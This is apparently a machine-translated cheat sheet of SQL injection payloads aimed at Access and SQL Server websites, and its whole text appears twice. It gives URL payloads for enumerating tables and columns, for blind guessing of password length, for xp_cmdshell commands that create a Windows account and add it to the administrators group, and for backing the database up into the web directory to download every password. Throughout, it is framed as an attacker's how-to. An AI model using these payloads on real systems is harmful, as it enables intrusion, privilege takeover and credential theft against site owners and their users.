ACCESS
Query database type
/?sort_id=24 and exists (select * from sysobjects)
The query table admin page returns to the normal display as there is, and the error is none.
//?sort_id=24 and exists (select * from admin)
Query the items admin in the admin table
/?sort_id=24 and exists (select admin_name from admin)
Query the content length of the item in admin in the admin table is less than an error, which is equal to returning to normal
//?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 Order by [pwd]) T Order by [pwd] desc)<=7
Brutal guessing the item admin_name in the admin table
SQL
①http://Site/?id=1;exec master..xp_cmdshell “net user name password /add”--
Semicolon; In SQLServer, it means that the two sentences are separated by the first and last sentences, -- means that the subsequent statement is annotated, so this sentence will be divided into two sentences in SQLServer. First, select the record with ID=1, and then execute the stored procedure xp_cmdshell. This stored procedure is used to call system commands. Therefore, a new windows account with user name and password is created with the net command, and then:
②http://Site/?id=1;exec master..xp_cmdshell “net localgroup administrators name /add”--
Add the newly created account name to the administrator group. In less than two minutes, you have obtained the highest system permissions! Of course, this method is only applicable to the situation where the database is connected with SA, otherwise, there is no permission to call xp_cmdshell.
③http://Site/?id=1 ;;and db_name()>0
There is a similar example and user>0 before, which is used to get the connection user name. db_name() is another system variable, and the connection database name is returned.
④ http://Site/?id=1;backup database Database Database name to disk='c:';--
This is a very ruthless move. From the database name obtained by ③, plus the absolute path exposed by some IIS errors, backup the database to the web directory, and then use HTTP to download the entire database completely, and all administrators and user passwords are fully visible! When you don’t know the absolute path, you can also backup the method to the network address (such as \202.), but the success rate is not high.
⑤http://Site/?id=1 ;;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
As mentioned earlier, sysobjects is a SQLServer system table, which stores all table names, views, constraints and other objects. xtype='U' and status>0 represents the table name created by the user. The above statement takes out the first table name and compares the size with 0, so that the error message can expose the table name. How to get the second and third table names? Let us smart readers think.
⑥ http://Site/?id=1 ;;and (Select Top 1 col_name(object_id('table name'),1) from sysobjects)>0
After getting the table name from ⑤, use object_id ('table name') to get the internal ID corresponding to the table name. Col_name (table name ID, 1) represents the first field name of the table. Change 1 to 2, 3, 4... and you can get the field names in the guessed table one by one.
Query database type
/?sort_id=24 and exists (select * from sysobjects)
The query table admin page returns to the normal display as there is, and the error is none.
//?sort_id=24 and exists (select * from admin)
Query the items admin in the admin table
/?sort_id=24 and exists (select admin_name from admin)
Query the content length of the item in admin in the admin table is less than an error, which is equal to returning to normal
//?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 Order by [pwd]) T Order by [pwd] desc)<=7
Brutal guessing the item admin_name in the admin table
SQL
①http://Site/?id=1;exec master..xp_cmdshell “net user name password /add”--
Semicolon; In SQLServer, it means that the two sentences are separated by the first and last sentences, -- means that the subsequent statement is annotated, so this sentence will be divided into two sentences in SQLServer. First, select the record with ID=1, and then execute the stored procedure xp_cmdshell. This stored procedure is used to call system commands. Therefore, a new windows account with user name and password is created with the net command, and then:
②http://Site/?id=1;exec master..xp_cmdshell “net localgroup administrators name /add”--
Add the newly created account name to the administrator group. In less than two minutes, you have obtained the highest system permissions! Of course, this method is only applicable to the situation where the database is connected with SA, otherwise, there is no permission to call xp_cmdshell.
③http://Site/?id=1 ;;and db_name()>0
There is a similar example and user>0 before, which is used to get the connection user name. db_name() is another system variable, and the connection database name is returned.
④ http://Site/?id=1;backup database Database Database name to disk='c:';--
This is a very ruthless move. From the database name obtained by ③, plus the absolute path exposed by some IIS errors, backup the database to the web directory, and then use HTTP to download the entire database completely, and all administrators and user passwords are fully visible! When you don’t know the absolute path, you can also backup the method to the network address (such as \202.), but the success rate is not high.
⑤http://Site/?id=1 ;;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
As mentioned earlier, sysobjects is a SQLServer system table, which stores all table names, views, constraints and other objects. xtype='U' and status>0 represents the table name created by the user. The above statement takes out the first table name and compares the size with 0, so that the error message can expose the table name. How to get the second and third table names? Let us smart readers think.
⑥ http://Site/?id=1 ;;and (Select Top 1 col_name(object_id('table name'),1) from sysobjects)>0
After getting the table name from ⑤, use object_id ('table name') to get the internal ID corresponding to the table name. Col_name (table name ID, 1) represents the first field name of the table. Change 1 to 2, 3, 4... and you can get the field names in the guessed table one by one.